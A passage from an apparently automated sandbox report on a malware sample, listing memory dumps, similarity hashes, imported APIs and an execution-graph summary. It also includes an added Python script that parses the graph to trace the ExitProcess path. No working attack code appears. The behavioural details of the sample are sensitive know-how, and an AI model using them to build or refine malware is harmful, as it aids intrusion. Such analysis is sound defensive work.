                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                • Instruction ID: 1cecd044e479bacfc2e9b5285e5c1e705b482abc8ac36cf072bdf9966a377643
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28112E7720014143EE988A2DC8B45B7A7D5EBC73217ACC376D1424B754DE22D545B720
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                • Instruction ID: da7243ee1f940096ed28c2dd433500c0dcf86598e6cb04ddb1c8fe15205662c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2E08C32A21228EBCB14EB98C904A8AF7ECFB4AB01B650096F501D3151C270DF00C7D0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
• String ID:
• API String ID: 57040152-0
• Opcode ID: 73c4790e5db93271ec562cbd445c16afb12c923f29862d523ef878e682105e28
• Instruction ID: 0e887f780b3cd126549a91179a53dbd9cc72776148c04069999b0221ad8702cb
• Opcode Fuzzy Hash: 73c4790e5db93271ec562cbd445c16afb12c923f29862d523ef878e682105e28
• Instruction Fuzzy Hash: B4A1E0B0A017159FEB20DB74C944BABB7E9FF15351F048529EC16D7282EB35EA08CB91
APIs
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
• Instruction ID: 7f5f487cca1cc5536369cb1e0ee79ab529e00db0fdc3bd1797757d154b9d6e49
• Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
• Instruction Fuzzy Hash: E7B102329046459FEB25AF28C881FEEBBF5FF55350F14816AE895EB242D6349D01CB70
APIs
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
• Opcode ID: 17e4e34786f0a56fdf2cbeba91fd2f247c075c2c1cadd3287473e32bbc317378
• Instruction ID: fa0e8a2299ba8f4ebaa2b2d5d88131debf94ec79954e7eea08c93667e26e2e36
• Opcode Fuzzy Hash: 17e4e34786f0a56fdf2cbeba91fd2f247c075c2c1cadd3287473e32bbc317378
• Instruction Fuzzy Hash: 58211D71A00219AFEF00EBA4D895DFEB7BAEF08710F500425F501A7252DB349E419BA0

Execution Graph

Execution Coverage: 0.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 610
Total number of Limit Nodes: 4
[Execution graph: the report renders this as an interactive graph of 610 nodes; the raw node/edge serialization behind it is not reproduced here. The imports the graph resolves, with one representative address each, are: CreateThreadpoolWork (70cb92), TpPostWork (70cde1), TpReleaseWork (70ca8d), InitOnceExecuteOnce (70bedf, 70cc3f), InitializeCriticalSectionEx (70cce3), RtlInitializeConditionVariable (70cd1f), SleepConditionVariableCS (70d1a7), RtlWakeAllConditionVariable (70d17b), GetSystemTimePreciseAsFileTime (70cbfb), GetCurrentThreadId (6f2f7e, 6f3132), recv (6fe0c0, 6fe122, 6fe157), Sleep and CreateMutexA (6fa953), GetPEB (72a302, 72653a) and ExitProcess (726562). The remaining nodes are MSVC runtime and STL routines (__Mtx_init_in_situ, __Mtx_unlock, __Mtx_destroy_in_situ, __Cnd_broadcast, __Cnd_destroy_in_situ, _xtime_get, __Xtime_diff_to_millis2, __cftof, __dosmaperr, ___std_exception_copy, __freea, _strrchr, __alldvrm, __aulldvrm, shared_ptr, __floor_pentium4, Concurrency::details::_Reschedule_chore, Concurrency::details::_ContextCallback::_CallInContext, Concurrency::cancel_current_task). The leaf call to ExitProcess is reached by the chain 726629 -> 7264c7 -> 7264d5 (__cftof) -> 72652b -> 72a302 (GetPEB) -> 72a31c -> 726535 -> 72653a (GetPEB) -> 72654a -> 726562 (ExitProcess), i.e. the PEB is read twice before the process is terminated; the function at 72652b is the one shown in the control-flow graph below.]
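Joe Sandbox serializes the execution graph as one flat token stream: a node is a decimal id followed by its hex address and any symbol or API labels, and an edge is written `src->dst`. The Python below is an added example, not part of the report or of Joe Sandbox's tooling; it parses that stream into nodes and edges, lists which nodes reference which import, and walks the graph backwards from ExitProcess to find every node from which the termination path is reachable. The token grammar (a decimal token starts a node only when the next token is an address) is an assumption inferred from this dump, and `SAMPLE` is a constructed excerpt copied from the report's own graph data: the GetPEB/ExitProcess chain, one node whose label contains a bare number, and the recv chain.

```python
"""Parse the flat execution-graph serialization found in Joe Sandbox reports.

Added example (not part of the report or of Joe Sandbox's tooling).  The
token grammar below is an assumption inferred from the dump on this page:

    <node-id> <hex-address> [label ...]   declares a node; labels are symbol
                                          or API names ("GetPEB", "recv") or
                                          phrases such as "3 API calls"
    <src>-><dst>                          declares a directed edge

Everything is whitespace separated and edges may appear anywhere.
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{5,8}$")
DECIMAL_RE = re.compile(r"^\d+$")
# Label words that are not API names.  Runtime-internal symbols are
# filtered by their underscore or "::" instead.
STOPWORDS = {"API", "calls"}

# Constructed sample: three excerpts copied from the report's own graph data
# (the GetPEB/ExitProcess chain, a __Mtx_init_in_situ node whose label holds
# a bare number, and the recv chain).
SAMPLE = """execution_graph
9674 726629 9677 7264c7 9674->9677 9678 7264d5 __cftof 9677->9678
9679 726520 9678->9679 9682 72652b 9678->9682 9681 72652a
9688 72a302 GetPEB 9682->9688 9684 726535 9685 72654a __cftof 9684->9685
9686 72653a GetPEB 9684->9686 9687 726562 ExitProcess 9685->9687 9686->9685
9689 72a31c __cftof 9688->9689 9689->9684
10146 709ef0 10147 709f0c 10146->10147
10148 70c68b __Mtx_init_in_situ 2 API calls 10147->10148 10149 709f17 10148->10149
10150 6fe0c0 recv 10151 6fe122 recv 10150->10151"""


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> {"addr", "labels"}; edges is a set."""
    tokens = text.split()
    nodes, edges, current = {}, set(), None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.add((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        # A decimal token starts a node only when the next token is an address.
        # The "2" in "2 API calls" is followed by "API", so it stays a label.
        if DECIMAL_RE.match(tok) and ADDR_RE.match(nxt):
            current = int(tok)
            nodes[current] = {"addr": nxt, "labels": []}
            i += 2
            continue
        if current is not None:  # anything else is a label of the open node
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def api_references(nodes):
    """Map API-looking labels (no underscore, no '::') to the node ids that carry them."""
    refs = defaultdict(set)
    for nid, node in nodes.items():
        for label in node["labels"]:
            if label in STOPWORDS or "_" in label or "::" in label:
                continue
            if not label[0].isalpha():
                continue
            refs[label].add(nid)
    return dict(refs)


def nodes_reaching(nodes, edges, api):
    """Ids of every node from which a node labelled `api` is reachable (reverse BFS)."""
    rev = defaultdict(set)
    for src, dst in edges:
        rev[dst].add(src)
    seen = {nid for nid, n in nodes.items() if api in n["labels"]}
    queue = deque(seen)
    while queue:
        for pred in rev[queue.popleft()]:
            if pred not in seen:
                seen.add(pred)
                queue.append(pred)
    return seen


def entry_addresses(nodes, edges, api):
    """Addresses of the roots (no predecessor inside the set) of the sub-graph reaching `api`."""
    reach = nodes_reaching(nodes, edges, api)
    has_pred = {dst for src, dst in edges if src in reach and dst in reach}
    return sorted(nodes[n]["addr"] for n in reach - has_pred)


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(SAMPLE)
    print(len(g_nodes), "nodes,", len(g_edges), "edges")
    for api, ids in sorted(api_references(g_nodes).items()):
        print(f"{api:12s} at", ", ".join(g_nodes[i]["addr"] for i in sorted(ids)))
    print("ExitProcess reachable from", entry_addresses(g_nodes, g_edges, "ExitProcess"))
```

Run against the full serialization, `entry_addresses(..., "ExitProcess")` gives the outermost callers of the termination path, which is the quickest way to see which part of the sample (the CRT abort path here, not the stealer logic) is responsible for the early exit the sandbox observed.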

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
APIs
• ExitProcess.KERNEL32(?,?,0072652A,?,?,?,?,?,00727661), ref: 00726567
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 6b7c259f9cd0d8b915ef5af03662b25ce8ff64a84b9c5304580b07dd7ee0212f
• Instruction ID: 737eff60574526dd58dea5b9f1434f8aae447698932a8d5682029f12dd75c2b7
• Opcode Fuzzy Hash: 6b7c259f9cd0d8b915ef5af03662b25ce8ff64a84b9c5304580b07dd7ee0212f
• Instruction Fuzzy Hash: 8DE08C31040118AFCF35BF1AE81DD9C3B69FB61745F004815F81886226CB29EEA1C690

Control-flow Graph (graph image not reproduced)

APIs
